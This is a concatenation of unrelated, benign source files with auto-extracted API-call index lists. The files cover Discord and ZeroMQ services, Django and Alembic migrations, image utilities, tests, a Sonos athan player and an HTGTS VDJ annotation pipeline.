] | [((215, 259), 'logging.getLogger', 'logging.getLogger', ([], {'name': '"""red.demaratus.mcoc"""'}), "(name='red.demaratus.mcoc')\n", (232, 259), False, 'import logging\n'), ((817, 833), 'redbot.core.commands.group', 'commands.group', ([], {}), '()\n', (831, 833), False, 'from redbot.core import commands, checks, Config\n'), ((1215, 1233), 'redbot.core.commands.command', 'commands.command', ([], {}), '()\n', (1231, 1233), False, 'from redbot.core import commands, checks, Config\n'), ((1239, 1289), 'redbot.core.commands.cooldown', 'commands.cooldown', (['(1)', '(60)', 'commands.BucketType.user'], {}), '(1, 60, commands.BucketType.user)\n', (1256, 1289), False, 'from redbot.core import commands, checks, Config\n'), ((1833, 1876), 'redbot.core.commands.group', 'commands.group', ([], {'invoke_without_command': '(True)'}), '(invoke_without_command=True)\n', (1847, 1876), False, 'from redbot.core import commands, checks, Config\n'), ((6651, 6667), 'redbot.core.commands.group', 'commands.group', ([], {}), '()\n', (6665, 6667), False, 'from redbot.core import commands, checks, Config\n'), ((6789, 6839), 'redbot.core.commands.cooldown', 'commands.cooldown', (['(1)', '(30)', 'commands.BucketType.user'], {}), '(1, 30, commands.BucketType.user)\n', (6806, 6839), False, 'from redbot.core import commands, checks, Config\n'), ((10255, 10273), 'redbot.core.commands.command', 'commands.command', ([], {}), '()\n', (10271, 10273), False, 'from redbot.core import commands, checks, Config\n'), ((453, 521), 'redbot.core.Config.get_conf', 'Config.get_conf', (['self'], {'identifier': '(153607829)', 'force_registration': '(True)'}), '(self, identifier=153607829, force_registration=True)\n', (468, 521), False, 'from redbot.core import commands, checks, Config\n'), ((1380, 1410), 'random.choice', 'random.choice', (["['3', '4', '5']"], {}), "(['3', '4', '5'])\n", (1393, 1410), False, 'import random\n'), ((6945, 6967), 'random.uniform', 'random.uniform', (['(0)', '(100)'], {}), '(0, 
100)\n', (6959, 6967), False, 'import random\n'), ((8357, 8379), 'random.uniform', 'random.uniform', (['(0)', '(100)'], {}), '(0, 100)\n', (8371, 8379), False, 'import random\n'), ((14892, 14937), 'redbot.core.utils.menus.menu', 'menus.menu', (['ctx', 'embeds', 'control'], {'message': 'msg'}), '(ctx, embeds, control, message=msg)\n', (14902, 14937), False, 'from redbot.core.utils import menus\n')] |
from interactionfreepy import IFBroker, IFWorker
from LibSync import LibSync
import sys
import threading
from datetime import datetime, timedelta
import time
from NTP import NTPSyncer
class IFNode:
def __init__(self):
self.inited = False
def init(self, serverRootURL,localRootPath):
if self.inited:raise RuntimeError('Already inited.')
IFWorker('tcp://localhost:{}'.format(localPort), 'LibSync', LibSync(serverRootURL, localRootPath))
self.inited=True
def test(self, a):
return 'IFNodePy: ' + a
def startTimeSyncLoop():
s = NTPSyncer('172.16.60.200')
threading.Thread(target=lambda: s.lock(60, 120), daemon=True).start()
return s
# while True:
# time.sleep(1)
# print('hahaha')
# f= open('D:\\test.txt', 'a')
# f.write('hahaha\n')
# f.flush()
if __name__ == '__main__':
print('start')
localPort = 224
broker = IFBroker('tcp://*:{}'.format(localPort))
broker.startWebSocket(82, '/ws/')
# serverRootURL ='http://172.16.60.200/IFAssets/IFNodeApplications/'
# localRootPath ='C:\\Users\\Administrator\\Downloads\\LibSyncTest\\'
serverRootURL = sys.stdin.readline().strip()
localRootPath = sys.stdin.readline().strip()
IFWorker('tcp://localhost:{}'.format(localPort), 'IFNodePy', IFNode())
IFWorker('tcp://localhost:{}'.format(localPort), 'LibSync', LibSync(serverRootURL, localRootPath))
IFWorker('tcp://localhost:{}'.format(localPort), 'TimeSync', startTimeSyncLoop())
while True:
l = sys.stdin.readline()
if (l == None or l == -1 or len(l) == 0):
sys.exit(0)
| [
"LibSync.LibSync",
"sys.exit",
"sys.stdin.readline",
"NTP.NTPSyncer"
] | [((556, 582), 'NTP.NTPSyncer', 'NTPSyncer', (['"""172.16.60.200"""'], {}), "('172.16.60.200')\n", (565, 582), False, 'from NTP import NTPSyncer\n'), ((1326, 1363), 'LibSync.LibSync', 'LibSync', (['serverRootURL', 'localRootPath'], {}), '(serverRootURL, localRootPath)\n', (1333, 1363), False, 'from LibSync import LibSync\n'), ((1472, 1492), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (1490, 1492), False, 'import sys\n'), ((414, 451), 'LibSync.LibSync', 'LibSync', (['serverRootURL', 'localRootPath'], {}), '(serverRootURL, localRootPath)\n', (421, 451), False, 'from LibSync import LibSync\n'), ((1114, 1134), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (1132, 1134), False, 'import sys\n'), ((1161, 1181), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (1179, 1181), False, 'import sys\n'), ((1545, 1556), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1553, 1556), False, 'import sys\n')] |
from django.db import models
class Pet(models.Model):
pet_name = models.CharField(max_length=20)
def __str__(self):
return self.pet_name
| [
"django.db.models.CharField"
] | [((70, 101), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(20)'}), '(max_length=20)\n', (86, 101), False, 'from django.db import models\n')] |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Add force_screenshot to alerts/reports
Revision ID: bb38f40aa3ff
Revises: <PASSWORD>
Create Date: 2021-12-10 19:25:29.802949
"""
# revision identifiers, used by Alembic.
revision = "bb38f40aa3ff"
down_revision = "3<PASSWORD>"
import sqlalchemy as sa
from alembic import op
from sqlalchemy.ext.declarative import declarative_base
from superset import db
Base = declarative_base()
class ReportSchedule(Base):
__tablename__ = "report_schedule"
id = sa.Column(sa.Integer, primary_key=True)
type = sa.Column(sa.String(50), nullable=False)
force_screenshot = sa.Column(sa.Boolean, default=False)
def upgrade():
with op.batch_alter_table("report_schedule") as batch_op:
batch_op.add_column(sa.Column("force_screenshot", sa.Boolean(), default=False))
bind = op.get_bind()
session = db.Session(bind=bind)
for report in session.query(ReportSchedule).all():
# Update existing alerts that send chart screenshots so that the cache is
# bypassed. We don't turn this one for dashboards because (1) it's currently
# not supported but also because (2) it can be very expensive.
report.force_screenshot = report.type == "Alert" and report.chart_id is not None
session.commit()
def downgrade():
with op.batch_alter_table("report_schedule") as batch_op:
batch_op.drop_column("force_screenshot")
| [
"alembic.op.get_bind",
"superset.db.Session",
"sqlalchemy.Boolean",
"alembic.op.batch_alter_table",
"sqlalchemy.String",
"sqlalchemy.ext.declarative.declarative_base",
"sqlalchemy.Column"
] | [((1154, 1172), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (1170, 1172), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((1251, 1290), 'sqlalchemy.Column', 'sa.Column', (['sa.Integer'], {'primary_key': '(True)'}), '(sa.Integer, primary_key=True)\n', (1260, 1290), True, 'import sqlalchemy as sa\n'), ((1366, 1402), 'sqlalchemy.Column', 'sa.Column', (['sa.Boolean'], {'default': '(False)'}), '(sa.Boolean, default=False)\n', (1375, 1402), True, 'import sqlalchemy as sa\n'), ((1582, 1595), 'alembic.op.get_bind', 'op.get_bind', ([], {}), '()\n', (1593, 1595), False, 'from alembic import op\n'), ((1610, 1631), 'superset.db.Session', 'db.Session', ([], {'bind': 'bind'}), '(bind=bind)\n', (1620, 1631), False, 'from superset import db\n'), ((1312, 1325), 'sqlalchemy.String', 'sa.String', (['(50)'], {}), '(50)\n', (1321, 1325), True, 'import sqlalchemy as sa\n'), ((1429, 1468), 'alembic.op.batch_alter_table', 'op.batch_alter_table', (['"""report_schedule"""'], {}), "('report_schedule')\n", (1449, 1468), False, 'from alembic import op\n'), ((2065, 2104), 'alembic.op.batch_alter_table', 'op.batch_alter_table', (['"""report_schedule"""'], {}), "('report_schedule')\n", (2085, 2104), False, 'from alembic import op\n'), ((1540, 1552), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (1550, 1552), True, 'import sqlalchemy as sa\n')] |
import os
from PIL import Image
import time
in_dir = 'images_1000'
out_dir = 'images_crop'
if not os.path.isdir(out_dir):
os.mkdir(out_dir)
img_list = os.listdir(in_dir)
for img_file in img_list:
print(img_file)
img_name = os.path.splitext(os.path.basename(img_file))[0]
img = Image.open(os.path.join(in_dir, img_file))
img_size = img.size
crop_width = round(img_size[0]/4)
for ii in range(4):
x1 = crop_width * ii
y1 = 0
x2 = crop_width * (ii + 1)
y2 = img_size[1]
img_c = img.crop([x1, y1, x2, y2])
now = str(int(time.time()))
img_crop_name = os.path.join(out_dir, img_name + '_' + now +'_'+ str(ii) + '.png')
img_c.save(img_crop_name)
| [
"os.listdir",
"os.path.join",
"os.path.isdir",
"os.mkdir",
"os.path.basename",
"time.time"
] | [((158, 176), 'os.listdir', 'os.listdir', (['in_dir'], {}), '(in_dir)\n', (168, 176), False, 'import os\n'), ((100, 122), 'os.path.isdir', 'os.path.isdir', (['out_dir'], {}), '(out_dir)\n', (113, 122), False, 'import os\n'), ((128, 145), 'os.mkdir', 'os.mkdir', (['out_dir'], {}), '(out_dir)\n', (136, 145), False, 'import os\n'), ((307, 337), 'os.path.join', 'os.path.join', (['in_dir', 'img_file'], {}), '(in_dir, img_file)\n', (319, 337), False, 'import os\n'), ((255, 281), 'os.path.basename', 'os.path.basename', (['img_file'], {}), '(img_file)\n', (271, 281), False, 'import os\n'), ((595, 606), 'time.time', 'time.time', ([], {}), '()\n', (604, 606), False, 'import time\n')] |
from floodsystem.stationdata import build_station_list, update_water_levels
from floodsystem.flood import stations_levels_over_threshold
def run():
# Build list of stations
stations = build_station_list()
# Update latest level data for all stations
update_water_levels(stations)
# Check which stations have relative water levels above 0.8
tol = 0.8
stations_over_tol = stations_levels_over_threshold(stations, tol)
for station, level in stations_over_tol:
if level < 100:
print(station.name, level)
if __name__ == "__main__":
print("*** Task 2B: CUED Part IA Flood Warning System ***")
run()
| [
"floodsystem.stationdata.build_station_list",
"floodsystem.flood.stations_levels_over_threshold",
"floodsystem.stationdata.update_water_levels"
] | [((195, 215), 'floodsystem.stationdata.build_station_list', 'build_station_list', ([], {}), '()\n', (213, 215), False, 'from floodsystem.stationdata import build_station_list, update_water_levels\n'), ((269, 298), 'floodsystem.stationdata.update_water_levels', 'update_water_levels', (['stations'], {}), '(stations)\n', (288, 298), False, 'from floodsystem.stationdata import build_station_list, update_water_levels\n'), ((403, 448), 'floodsystem.flood.stations_levels_over_threshold', 'stations_levels_over_threshold', (['stations', 'tol'], {}), '(stations, tol)\n', (433, 448), False, 'from floodsystem.flood import stations_levels_over_threshold\n')] |
"""
Use a common library (skimage) as a source of truth for
experimental images to analyze
"""
import skimage
import pathlib
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
def saveImage(data: np.ndarray, name: str):
# save it to disk
repoRoot = pathlib.Path(__file__).parent.parent
dataFolder = repoRoot.joinpath("data/images")
if len(data.shape) == 2:
np.savetxt(dataFolder.joinpath(f"{name}.txt"), data, fmt="%d")
Image.fromarray(data).save(dataFolder.joinpath(f"{name}.png"))
# read it from disk and verify it matches
data2 = np.array(Image.open(dataFolder.joinpath(f"{name}.png")))
assert(data2.all() == data.all())
if __name__ == "__main__":
imageFuncs = [
"astronaut", "binary_blobs", "brick", "camera", "cat", "cell",
"checkerboard", "chelsea", "clock", "coffee", "coins",
"colorwheel", "grass", "gravel", "horse", "hubble_deep_field",
"immunohistochemistry", "logo", "microaneurysms",
"moon", "page", "retina", "rocket", "stereo_motorcycle",
]
for funcName in imageFuncs:
print(funcName)
func = getattr(skimage.data, funcName)
data = func()
saveImage(data, funcName)
| [
"PIL.Image.fromarray",
"pathlib.Path"
] | [((283, 305), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (295, 305), False, 'import pathlib\n'), ((474, 495), 'PIL.Image.fromarray', 'Image.fromarray', (['data'], {}), '(data)\n', (489, 495), False, 'from PIL import Image\n')] |
import torch
def cross_entropy_loss():
return torch.nn.CrossEntropyLoss(reduction="mean")
| [
"torch.nn.CrossEntropyLoss"
] | [((52, 95), 'torch.nn.CrossEntropyLoss', 'torch.nn.CrossEntropyLoss', ([], {'reduction': '"""mean"""'}), "(reduction='mean')\n", (77, 95), False, 'import torch\n')] |
"""
Tests for HAProxyMonitor
run with nosetests
"""
__copyright__ = '2013, Room 77, Inc.'
__author__ = '<NAME> <<EMAIL>>'
from flexmock import flexmock
import unittest
from pylib.monitor.haproxy.haproxy_cluster_monitor_group import HAProxyClusterMonitorGroup
def mock_monitor(url, available):
"""
Create a mock HAProxyMonitor
Args:
url (string): url of haproxy stats page for this monitor
available (bool): whether this monitor is reachable
"""
mock_monitor = flexmock(url=url)
if available:
mock_monitor.should_receive('check').and_return(True)
else:
mock_monitor.should_receive('check').and_raise(IOError)
return mock_monitor
class TestHAProxyClusterMonitorGroup(unittest.TestCase):
def test_check(self):
cluster_monitors = {'cluster1': [mock_monitor(
'http://cluster1.room77.com/mock_haproxy', avail) for avail in
[True, True, True, True]],
'cluster2': [mock_monitor(
'http://cluster2.room77.com/mock_haproxy', avail) for avail in
[False, True, True, True]],
'cluster3': [mock_monitor(
'http://cluster3.room77.com/mock_haproxy', avail) for avail in
[True, False, False, False]],
'cluster4': [mock_monitor(
'http://cluster3.room77.com/mock_haproxy', avail) for avail in
[False, True, True, False]]}
monitor_group = HAProxyClusterMonitorGroup('<EMAIL>',
cluster_monitors)
# mock is_active so we don't read clusters conf
(flexmock(monitor_group)
.should_receive('is_active')
.and_return(True))
# expect one email to be sent in cluster 4
(flexmock(monitor_group)
.should_receive('send_email')
.and_return(True)
.once())
monitor_group.check()
| [
"pylib.monitor.haproxy.haproxy_cluster_monitor_group.HAProxyClusterMonitorGroup",
"flexmock.flexmock"
] | [((484, 501), 'flexmock.flexmock', 'flexmock', ([], {'url': 'url'}), '(url=url)\n', (492, 501), False, 'from flexmock import flexmock\n'), ((1511, 1566), 'pylib.monitor.haproxy.haproxy_cluster_monitor_group.HAProxyClusterMonitorGroup', 'HAProxyClusterMonitorGroup', (['"""<EMAIL>"""', 'cluster_monitors'], {}), "('<EMAIL>', cluster_monitors)\n", (1537, 1566), False, 'from pylib.monitor.haproxy.haproxy_cluster_monitor_group import HAProxyClusterMonitorGroup\n'), ((1672, 1695), 'flexmock.flexmock', 'flexmock', (['monitor_group'], {}), '(monitor_group)\n', (1680, 1695), False, 'from flexmock import flexmock\n'), ((1807, 1830), 'flexmock.flexmock', 'flexmock', (['monitor_group'], {}), '(monitor_group)\n', (1815, 1830), False, 'from flexmock import flexmock\n')] |
# For compatibility with Python2
from __future__ import print_function, division, absolute_import
#
import spekpy as sp
print("\n** Script to save, load and remove a new spectrum from disk **\n")
# Generate filtered spectrum
s=sp.Spek(kvp=120,th=12).filter('Al',2.5)
# Print summary of metrics
s.summarize(mode="full")
# Save spectrum as new state
state_name='My spectrum state'
s.save_state(state_name)
# See all user-saved states
sp.Spek.show_states(state_dir="usr")
# Load the new saved state
t=sp.Spek.load_state(state_name)
# Print summary of metrics (should be the same as above)
t.summarize(mode="full")
# Remove/delete te state
sp.Spek.remove_state('My spectrum state')
# See all user-saved states (new state should now have been removed)
sp.Spek.show_states(state_dir="usr")
| [
"spekpy.Spek",
"spekpy.Spek.show_states",
"spekpy.Spek.load_state",
"spekpy.Spek.remove_state"
] | [((434, 470), 'spekpy.Spek.show_states', 'sp.Spek.show_states', ([], {'state_dir': '"""usr"""'}), "(state_dir='usr')\n", (453, 470), True, 'import spekpy as sp\n'), ((500, 530), 'spekpy.Spek.load_state', 'sp.Spek.load_state', (['state_name'], {}), '(state_name)\n', (518, 530), True, 'import spekpy as sp\n'), ((638, 679), 'spekpy.Spek.remove_state', 'sp.Spek.remove_state', (['"""My spectrum state"""'], {}), "('My spectrum state')\n", (658, 679), True, 'import spekpy as sp\n'), ((749, 785), 'spekpy.Spek.show_states', 'sp.Spek.show_states', ([], {'state_dir': '"""usr"""'}), "(state_dir='usr')\n", (768, 785), True, 'import spekpy as sp\n'), ((229, 252), 'spekpy.Spek', 'sp.Spek', ([], {'kvp': '(120)', 'th': '(12)'}), '(kvp=120, th=12)\n', (236, 252), True, 'import spekpy as sp\n')] |
#!/usr/bin/env python
import os
import time
import datetime
from soco import SoCo
from threading import Thread
from SocketServer import TCPServer
from __future__ import print_function
from SimpleHTTPServer import SimpleHTTPRequestHandler
# Athan files names - mp3 files should be placed in the same folder as script
REG_ATAHN = '1016.mp3'
FAJR_ATHAN = '168410.mp3'
PORT = 8000 # Port number for web server
MY_IP = '192.168.1.10' # IP of the Raspberry Pi
SPEAKER_IP = '192.168.1.11' # IP of the Sonos speaker
class HttpServer(Thread):
def __init__(self, port):
super(HttpServer, self).__init__()
self.daemon = True
handler = SimpleHTTPRequestHandler
self.httpd = TCPServer(('', port), handler)
def run(self):
print("Starting http server")
self.httpd.serve_forever()
def stop(self):
print("Stopping http server")
self.httpd.socket.close()
def play_athan(sonos, file):
netpath = 'http://{}:{}/rpi_athan/{}'.format(MY_IP, PORT, file)
sonos.volume = 50
sonos.play_uri(netpath)
def main():
sonos = SoCo(SPEAKER_IP)
server = HttpServer(port)
isFajr = datetime.datetime.now().hour < 7
athan_file = FAJR_ATHAN if isFajr else REG_ATAHN
current_track = sonos.get_current_track_info()
if current_track:
print("Found {} playing...".format(current_track['title']))
seek_time = current_track['position']
prev_volume = sonos.volume
playlist_pos = int(current_track['playlist_position'])
server.start()
play_athan(sonos, athan_file)
# Sleep for the amount of time it takes the athan to play
time.sleep(245 if isFajr else 190)
if current_track:
print("Returning to {}...".format(current_track['title']))
sonos.volume = prev_volume
sonos.play_from_queue(playlist_pos)
sonos.seek(seek_time)
server.stop()
main()
| [
"SocketServer.TCPServer",
"datetime.datetime.now",
"soco.SoCo",
"time.sleep"
] | [((1044, 1060), 'soco.SoCo', 'SoCo', (['SPEAKER_IP'], {}), '(SPEAKER_IP)\n', (1048, 1060), False, 'from soco import SoCo\n'), ((1556, 1590), 'time.sleep', 'time.sleep', (['(245 if isFajr else 190)'], {}), '(245 if isFajr else 190)\n', (1566, 1590), False, 'import time\n'), ((689, 719), 'SocketServer.TCPServer', 'TCPServer', (["('', port)", 'handler'], {}), "(('', port), handler)\n", (698, 719), False, 'from SocketServer import TCPServer\n'), ((1098, 1121), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1119, 1121), False, 'import datetime\n')] |
# Generated by Django 3.0.3 on 2020-06-12 04:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rent', '0006_rentorder_pay'),
]
operations = [
migrations.AddField(
model_name='rentorder',
name='money',
field=models.IntegerField(default=0, verbose_name='金额'),
),
]
| [
"django.db.models.IntegerField"
] | [((328, 377), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'verbose_name': '"""金额"""'}), "(default=0, verbose_name='金额')\n", (347, 377), False, 'from django.db import migrations, models\n')] |
#### Usage: python3 this.py <VDJ.bed> <D.fa> <scripts_dir> <input.tlx> <output_prefix>
#### 2020-02-11, we think the default score threshold = 5 of D annotation in VDJ recombination (yyx_annotate_tlx_midD_LCS.20190116.py) may be too stringent.
#### We decide to change it to 3, and then implement another script to iteratively calculate D usage in VDJ
import sys, os, os.path, subprocess, time
### flushing print, reference: https://mail.python.org/pipermail/python-list/2015-November/698426.html
def _print(*args, **kwargs):
file = kwargs.get('file', sys.stdout)
print(*args, **kwargs)
file.flush()
### reference: Yyx_system_command_functions.20160607.pl, tlx2bed_v3.py
start_time = time.time()
_print('[PYTHON-START] ' + time.ctime(), file=sys.stderr)
def check_elapsed_time(start_time):
end_time = time.time()
elapsed_time = end_time - start_time
day = int(elapsed_time / (3600*24))
hour = int(elapsed_time % (3600*24) / 3600)
min = int(elapsed_time % 3600 / 60)
sec = elapsed_time % 60
elapsed_time = ''
if day>0 : elapsed_time += '{}day '.format(day)
if hour>0: elapsed_time += '{}h'.format(hour)
if min>0 : elapsed_time += '{}min'.format(min)
if sec>0 or elapsed_time == '': elapsed_time += '{:.2f}s'.format(sec)
_print('[PYTHON-TIME] ' + elapsed_time, file=sys.stderr)
def check_is_empty_dir(dirname):
if os.path.isdir(dirname):
for nowDirName, subdirList, fileList in os.walk(dirname):
if nowDirName == '.':
return len(subfileList) == 0
else:
continue
else:
_print('Warning: Not a dir is attemped to be checked', file=sys.stderr)
return None
def exist_file_or_dir(filenames, prompt_str, mode='any'):
if mode not in ('any', 'all'):
_print('Error: mode should be either "any" or "all", in exist_file_or_dir()', file=sys.stderr)
return None
is_mode_all = False
if mode == 'any':
is_mode_all = True
if isinstance(filenames, str):
filenames = [filenames]
not_None_count = 0
for filename in filenames:
if filename is None:
continue
not_None_count += 1
if os.path.isdir(filename):
if not check_is_empty_dir(filename):
_print('[CHECK-EXIST] Dir ' + filename + ' has already existed, and not empty. ' + prompt_str, file=sys.stderr)
if not is_mode_all:
return True
else:
if is_mode_all:
return False
elif os.path.isfile(filename) and os.path.getsize(filename) >= 100:
# os.path.getsize(x) may also be os.stat(x).st_size
_print('[CHECK-EXIST] File ' + filename + ' has already existed. ' + prompt_str, file=sys.stderr)
if not is_mode_all:
return True
else:
if is_mode_all:
return False
if not_None_count > 0:
return is_mode_all
return False
def check_final_file_then_remove_intermediate_file(final_filenames, intermediate_filenames, mode='all'):
if mode not in ('any', 'all'):
_print('Error: mode should be either "any" or "all", in check_final_file_then_remove_intermediate_file()', file=sys.stderr)
return
if isinstance(intermediate_filenames, str):
intermediate_filenames = [intermediate_filenames]
if exist_file_or_dir(final_filenames, 'So remove intermediate files...', mode=mode):
for filename in intermediate_filenames:
if filename is None:
continue
if os.path.exists(filename):
_print('[PYTHON-REMOVE] ' + filename, file=sys.stderr)
os.remove(filename)
def check_file_then_exec_command(filenames, command, should_time=False, error_stop=False, not_run=False):
start_time = time.time()
_print('[SUBPROCESS-CALL] ' + command, file=sys.stderr)
if exist_file_or_dir(filenames, 'Skip this above command...', mode='any'):
return
if not not_run:
# returnValue = os.system('/bin/bash -c ' + command)
returnValue = subprocess.call(['/bin/bash', '-c', command])
if returnValue != 0:
if error_stop:
_print('Error: when exec last command, return value = {}'.format(returnValue), file=sys.stderr)
sys.exit(returnValue)
if should_time:
check_elapsed_time(start_time)
def stop_if_file_not_exist(filenames, mode='any'):
if mode not in ('any', 'all'):
_print('Error: mode should be either "any" or "all", in stop_if_file_not_exist()', file=sys.stderr)
return None
is_mode_all = False
if mode == 'all':
is_mode_all = True
if isinstance(filenames, str):
filenames = [filenames]
checkFileNumber = 0
missingFileNumber = 0
for filename in filenames:
if filename is None:
continue
checkFileNumber += 1
if not os.path.isfile(filename):
# os.path.getsize(x) may also be os.stat(x).st_size
_print('[CHECK-EXIST] File ' + filename + ' does not exist.', file=sys.stderr)
missingFileNumber += 1
else:
_print('[CHECK-EXIST] File ' + filename + ' exists. Good.', file=sys.stderr)
if missingFileNumber > 0:
if not is_mode_all:
_print('[STOP-NOT-EXIST] Error: requested {} file(s) is missing. Terminate!'.format(missingFileNumber), file=sys.stderr)
sys.exit(missingFileNumber)
elif missingFileNumber == checkFileNumber:
_print('[STOP-NOT-EXIST] Error: requested file(s) is missing. Terminate!', file=sys.stderr)
sys.exit(missingFileNumber)
#import string
#def generateRandomString(length, charSet=string.ascii_uppercase+string.ascii_lowercase):
# return ''.join(random.choice(charSet) for _ in range(length))
def list_assign(inputList, idx, value):
while len(inputList) <= idx:
inputList.append(None)
inputList[idx] = value
return inputList
bed_filename, D_ref_filename, scripts_root_dirname, input_tlx_filename, output_prefix = sys.argv[1:]
date_postfix = time.strftime('%Y%m%d')
### reference: work_flow.annotate_GSE82126_tlx.20190116.sh, work_flow.annotate_Alt225_tlx.20190116.sh
output_filenames = []
parts = ('junction', 'prey', 'bait')
is_tlx_gzipped = False
if input_tlx_filename.endswith('.gz'):
is_tlx_gzipped = True
list_assign(output_filenames, 4, '{}.sequence_segmented.{}.tlx'.format(output_prefix, date_postfix))
list_assign(output_filenames, 6, '{}.intersectBed_annotated.{}.tlx'.format(output_prefix, date_postfix))
list_assign(output_filenames, 8, '{}.annotate_tlx_midD_LCS.{}.tlx'.format(output_prefix, date_postfix) )
list_assign(output_filenames, 10, '{}.HTGTS_annotate_merged.{}'.format(output_prefix, date_postfix) )
list_assign(output_filenames, 11, output_filenames[10] + '.tsv' )
list_assign(output_filenames, 12, output_filenames[10] + '.log' )
list_assign(output_filenames, 15, '{}.HTGTS_VDJ_annotated.{}.tsv'.format(output_prefix, date_postfix) )
#used_scripts_filenames = [
# 'yyx_tlx2bed.20181223.py', 'yyx_sequence_segment_tlx.20181221.py', 'yyx_annotate_tlx_with_intersectBedResults.20181223.py',
# 'yyx_annotate_tlx_midD_LCS.20190116.py', 'yyx_uniq_count_and_merge.20190111.py'
# ]
if not exist_file_or_dir(output_filenames[15], 'So skip all HTGTS annotation part...', mode='any'):
stop_if_file_not_exist(input_tlx_filename)
stop_if_file_not_exist('{}/Yyx_check_col_num.pl'.format(scripts_root_dirname))
command = '{}/Yyx_check_col_num.pl '.format(scripts_root_dirname) + input_tlx_filename
if is_tlx_gzipped:
command = '{}/Yyx_check_col_num.pl <(zcat {} | head -n2)'.format(scripts_root_dirname, input_tlx_filename)
_print('[SUBPROCESS-CHECK-OUTPUT] ' + command, file=sys.stderr)
outBytes = subprocess.check_output(['/bin/bash', '-c', command])
outStr = outBytes.decode('utf-8')
# _print('[DEBUG] ' + outStr, file=sys.stderr)
headline_colnum_str = outStr.split('\n')[1]
_print(' Original column number = ' + headline_colnum_str, file=sys.stderr)
original_colnum = int(headline_colnum_str)
if not exist_file_or_dir(output_filenames[6], 'So skip intersectBed part...', mode='any'):
stop_if_file_not_exist('{}/yyx_tlx2bed.20200126.py'.format(scripts_root_dirname))
for i in range(len(parts)):
part = parts[i]
tmp_bed_filename = '{}.{}.{}.tmp.bed'.format(output_prefix, part, date_postfix)
out_bed_filename = '{}.{}.{}.bed'.format(output_prefix, part, date_postfix)
list_assign(output_filenames, i, out_bed_filename)
command = ('z' if is_tlx_gzipped else '') + 'cat "' + input_tlx_filename + '" | python3 {}/yyx_tlx2bed.20181223.py '.format(scripts_root_dirname) + part + ' >' + tmp_bed_filename
check_file_then_exec_command(tmp_bed_filename, command, should_time=True)
command = 'bedtools intersect -a ' + tmp_bed_filename + ' -b ' + bed_filename + ' -wao >' + out_bed_filename
check_file_then_exec_command(out_bed_filename, command, should_time=True)
check_final_file_then_remove_intermediate_file(out_bed_filename, tmp_bed_filename)
stop_if_file_not_exist('{}/yyx_sequence_segment_tlx.20181221.py'.format(scripts_root_dirname))
# list_assign(output_filenames, 4, '{}.sequence_segmented.{}.tlx'.format(output_prefix, date_postfix))
command = ('z' if is_tlx_gzipped else '') + 'cat "' + input_tlx_filename + '" | python3 {}/yyx_sequence_segment_tlx.20181221.py >{}'.format(scripts_root_dirname, output_filenames[4])
check_file_then_exec_command(output_filenames[4], command, should_time=True)
stop_if_file_not_exist('{}/yyx_annotate_tlx_with_intersectBedResults.20181223.py'.format(scripts_root_dirname))
# list_assign(output_filenames, 6, '{}.intersectBed_annotated.{}.tlx'.format(output_prefix, date_postfix))
command = 'python3 {}/yyx_annotate_tlx_with_intersectBedResults.20181223.py {} {} {} {}'.format(scripts_root_dirname, output_filenames[4], output_filenames[0], output_filenames[1], output_filenames[2]) + " | perl -pe 'BEGIN{$r=-1;} $r++; if($r==0){ s/anno1/junction/g; s/anno2/prey/g; s/anno3/bait/g; }' >" + output_filenames[6]
check_file_then_exec_command(output_filenames[6], command, should_time=True)
check_final_file_then_remove_intermediate_file(output_filenames[6], output_filenames[0:5])
if not exist_file_or_dir(output_filenames[8], 'So skip miD_LCS part...', mode='any'):
stop_if_file_not_exist('{}/yyx_annotate_tlx_midD_LCS.20190116.py'.format(scripts_root_dirname))
# list_assign(output_filenames, 8, '{}.annotate_tlx_midD_LCS.{}.tlx'.format(output_prefix, date_postfix) )
command = ('z' if is_tlx_gzipped else '') + 'cat "' + input_tlx_filename + '" | python3 {}/yyx_annotate_tlx_midD_LCS.20190116.py {} {} >{}'.format(scripts_root_dirname, D_ref_filename, 3, output_filenames[8])
check_file_then_exec_command(output_filenames[8], command, should_time=True)
stop_if_file_not_exist('{}/yyx_uniq_count_and_merge.20190111.py'.format(scripts_root_dirname))
# list_assign(output_filenames, 10, '{}.HTGTS_annotate_merged.{}'.format(output_prefix, date_postfix) )
# list_assign(output_filenames, 11, output_filenames[10] + '.tsv' )
# list_assign(output_filenames, 12, output_filenames[10] + '.log' )
command = 'python3 {}/yyx_uniq_count_and_merge.20190111.py - 0 {} {}:1-{} {}:1-{}'.format(scripts_root_dirname, output_filenames[10], output_filenames[6], original_colnum+5, output_filenames[8], original_colnum+5)
check_file_then_exec_command(output_filenames[11], command, should_time=True)
stop_if_file_not_exist('{}/yyx_show_or_skip_or_retrieve_columns.20190128.py'.format(scripts_root_dirname))
# list_assign(output_filenames, 15, '{}.HTGTS_VDJ_annotate.{}.tsv'.format(output_prefix, date_postfix) )
command = 'cat {} | python3 {}/yyx_show_or_skip_or_retrieve_columns.20190128.py skip '.format(output_filenames[11], scripts_root_dirname) + "'^count_in_file_.*'" + ' >' + output_filenames[15]
check_file_then_exec_command(output_filenames[15], command, should_time=True)
check_final_file_then_remove_intermediate_file(output_filenames[15], output_filenames[9:15])
